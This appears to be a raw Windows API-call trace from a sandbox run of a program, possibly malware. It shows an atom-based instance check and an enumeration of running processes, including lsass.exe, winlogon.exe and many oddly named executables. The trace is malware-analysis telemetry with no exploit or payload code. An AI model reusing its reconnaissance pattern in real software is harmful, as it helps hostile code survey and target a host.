	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetLastError () returned 0x5
	[0126.082] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.082] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.082] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.082] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.082] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.082] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.083] CloseHandle (hObject=0x69c) returned 1
	[0126.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.083] CloseHandle (hObject=0x69c) returned 1
	[0126.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.083] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.083] CloseHandle (hObject=0x69c) returned 1
	[0126.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.084] CloseHandle (hObject=0x69c) returned 1
	[0126.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.084] CloseHandle (hObject=0x69c) returned 1
	[0126.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.084] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.085] CloseHandle (hObject=0x69c) returned 1
	[0126.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d368, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d78) returned 0xc0000004
	[0126.116] VirtualAlloc (lpAddress=0x0, dwSize=0x16e78, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0126.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e78, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0126.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0126.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.121] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.121] CloseHandle (hObject=0x69c) returned 1
	[0126.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.122] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.122] CloseHandle (hObject=0x69c) returned 1
	[0126.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d248, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.122] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.122] CloseHandle (hObject=0x69c) returned 1
	[0126.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.123] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.123] CloseHandle (hObject=0x69c) returned 1
	[0126.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.124] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.124] CloseHandle (hObject=0x69c) returned 1
	[0126.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.125] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.125] CloseHandle (hObject=0x69c) returned 1
	[0126.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.125] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.125] CloseHandle (hObject=0x69c) returned 1
	[0126.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.126] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.126] CloseHandle (hObject=0x69c) returned 1
	[0126.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.126] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.126] CloseHandle (hObject=0x69c) returned 1
	[0126.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.127] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.127] CloseHandle (hObject=0x69c) returned 1
	[0126.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.127] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.127] CloseHandle (hObject=0x69c) returned 1
	[0126.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.127] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.127] CloseHandle (hObject=0x69c) returned 1
	[0126.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.128] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.128] CloseHandle (hObject=0x69c) returned 1
	[0126.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d248, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.128] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.128] CloseHandle (hObject=0x69c) returned 1
	[0126.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b97a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.128] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.128] CloseHandle (hObject=0x69c) returned 1
	[0126.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.129] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.129] CloseHandle (hObject=0x69c) returned 1
	[0126.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.129] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.129] CloseHandle (hObject=0x69c) returned 1
	[0126.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.130] CloseHandle (hObject=0x69c) returned 1
	[0126.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d4c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.130] CloseHandle (hObject=0x69c) returned 1
	[0126.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d4a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.130] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.130] CloseHandle (hObject=0x69c) returned 1
	[0126.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.131] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.131] CloseHandle (hObject=0x69c) returned 1
	[0126.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.131] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.131] CloseHandle (hObject=0x69c) returned 1
	[0126.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.131] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.131] CloseHandle (hObject=0x69c) returned 1
	[0126.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.132] CloseHandle (hObject=0x69c) returned 1
	[0126.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.132] CloseHandle (hObject=0x69c) returned 1
	[0126.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d368, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.133] CloseHandle (hObject=0x69c) returned 1
	[0126.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.133] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.133] CloseHandle (hObject=0x69c) returned 1
	[0126.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d368, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.133] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.133] CloseHandle (hObject=0x69c) returned 1
	[0126.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.134] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.134] CloseHandle (hObject=0x69c) returned 1
	[0126.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b97a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.134] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.134] CloseHandle (hObject=0x69c) returned 1
	[0126.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.134] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
	[0126.135] GetLastError () returned 0x5
